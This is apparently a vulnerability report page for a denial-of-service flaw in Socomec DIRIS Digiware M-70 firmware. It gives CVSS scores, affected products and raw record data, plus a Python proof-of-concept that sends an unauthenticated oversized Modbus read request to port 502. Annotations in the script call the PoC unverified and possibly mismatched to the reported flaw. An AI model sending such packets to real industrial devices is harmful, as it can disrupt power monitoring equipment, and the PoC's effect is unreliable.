Security Vulnerability Report
CVE-2025-23417 CVSS 8.6 HIGH

CVE-2025-23417

Published: 2025-12-01 16:15:52
Last Modified: 2025-12-05 20:49:08

Description

A denial of service vulnerability exists in the Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
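CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
Note: 8.6 is the score marked "Secondary" in the raw record at the bottom of this page. The entry marked "Primary" there scores 7.5 HIGH with scope unchanged (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).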

Configurations (Affected Products)

cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:* - VULNERABLE
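cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:* - NOT VULNERABLE (hardware platform entry: the raw record joins it to the firmware entry above with AND, meaning the listed firmware is affected when running on this hardware)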
Socomec DIRIS Digiware M-70 1.6.9 and earlier versions (the CPE entries above name only firmware 1.6.9)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
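#!/usr/bin/env python3
"""
CVE-2025-23417 PoC - Socomec DIRIS Digiware M-70 Modbus RTU DoS

Note: This PoC is for educational and authorized testing purposes only.

Review notes:
- Unverified: the page shows no evidence that this script was run against
  a device. The page's record classifies the issue as CWE-306 (missing
  authentication), not as a parsing or memory-safety flaw, so this request
  may not reproduce the reported condition.
- Exposure: the request is sent without any authentication to the Modbus
  service (TCP 502 by default). Limiting which hosts can reach that
  service, and following the vendor advisory referenced on the page, are
  the controls this traffic depends on.
"""

import socket
import struct
import sys


def create_malformed_modbus_packet():
    """Build the 12-byte request that this script sends.

    Returns:
        bytes: a 7-byte MBAP-style header followed by a 5-byte
        function 0x03 (Read Holding Registers) request.
    """
    # NOTE(review): this is Modbus/TCP (MBAP) framing, while the CVE text
    # names "Modbus RTU over TCP"; the page does not reconcile the two.
    header = struct.pack(
        ">HHHB",
        0x0001,  # transaction id
        0x0000,  # protocol id
        0x0009,  # declared length; only 6 bytes follow (kept as published)
        0xFF,    # unit identifier
    )

    # Function 0x03, start address 0, quantity 0xFFFF. The Modbus
    # specification caps function 0x03 at 125 registers per request, so
    # protocol-aware filtering can reject or alert on this value. The
    # published comment's mention of a buffer overflow is not backed by
    # anything on the page.
    pdu = struct.pack(">BHH", 0x03, 0x0000, 0xFFFF)

    return header + pdu


def exploit(target_ip, target_port=502):
    """Open one TCP connection and send the request built above.

    Args:
        target_ip: host to connect to.
        target_port: TCP port of the Modbus service (default 502).

    Returns:
        None. Progress and errors are printed. No response is read, so
        the success messages only mean that send() returned; they do not
        show the state of the device.
    """
    print(f"[*] Target: {target_ip}:{target_port}")
    print("[*] Crafting malformed Modbus RTU packet...")

    packet = create_malformed_modbus_packet()

    try:
        print(f"[*] Sending malicious packet ({len(packet)} bytes)...")
        # The context manager closes the socket on every path, including
        # when connect() or send() raises (the published version leaked
        # the socket on those paths).
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(10)
            sock.connect((target_ip, target_port))
            sock.send(packet)
            print("[+] Packet sent successfully")
            print("[*] Target may be experiencing DoS condition")
    except socket.timeout:
        print("[-] Connection timeout - target may already be affected")
    except socket.error as e:
        print(f"[-] Socket error: {e}")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)

    target = sys.argv[1]
    try:
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 502
    except ValueError:
        # A non-numeric port gets the usage line instead of a traceback.
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)

    exploit(target, port)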

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-23417", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:52.207", "lastModified": "2025-12-05T20:49:08.017", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial of service vulnerability exists in the Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:*", "matchCriteriaId": "C07608BE-E7E3-44F5-AE9A-4AE36679F58A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:*", "matchCriteriaId": 
"153A9D26-2C76-4B6B-AFD8-22DEB2081F34"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2139", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.socomec.fr/sites/default/files/2025-04/CVE-2025-23417---Diris-Digiware-Webview-_VULNERABILITIES_2025-04-11-17-16-19_English_0.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2139", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Vendor Advisory"]}]}}